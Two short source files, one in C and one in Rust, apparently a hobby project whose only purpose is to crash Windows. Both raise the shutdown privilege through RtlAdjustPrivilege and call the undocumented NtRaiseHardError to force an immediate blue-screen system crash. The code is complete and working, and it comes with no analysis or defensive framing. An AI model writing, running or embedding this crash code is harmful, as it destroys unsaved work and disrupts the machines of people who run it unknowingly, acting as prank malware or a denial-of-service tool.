File: crash.c
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

NTSTATUS NTAPI RtlAdjustPrivilege(ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrThread, PBOOLEAN StatusPointer);
NTSTATUS NTAPI NtRaiseHardError(LONG ErrorStatus, ULONG Unless1, ULONG Unless2, PULONG_PTR Unless3, ULONG ValidResponseOption, PULONG ResponsePointer);

int main() {
    BOOLEAN PrivilegeState = FALSE;
    ULONG ErrorResponse = 0;
    RtlAdjustPrivilege(19, TRUE, FALSE, &PrivilegeState);
    printf("Crashing...");
    NtRaiseHardError(STATUS_IN_PAGE_ERROR, 0, 0, NULL, 6, &ErrorResponse);
    printf("Crash failed!");
    return 0;
}

File: crash.rs
//credit to sparkster for helping me rewrite in rust
use std::ptr;

#[link(name = "ntdll")]
extern "system" {
    fn RtlAdjustPrivilege(Privilege: u32, Enable: bool, CurrThread: bool, StatusPointer: *mut bool) -> u32;
    fn NtRaiseHardError(
        ErrorStatus: u32,
        Unless1: u32,
        Unless2: u32,
        Unless3: *mut usize,
        ValidResponseOption: u32,
        ResponsePointer: *mut u32,
    ) -> u32;
}

fn main() {
    let mut privilege_state = false;
    let mut error_response = 0;

    unsafe {
        RtlAdjustPrivilege(19, true, false, &mut privilege_state);
        println!("Crashing...");
        NtRaiseHardError(
            0xC0000006u32, // STATUS_IN_PAGE_ERROR
            0,
            0,
            ptr::null_mut(),
            6,
            &mut error_response,
        );
        println!("Crash failed!");
    }
}
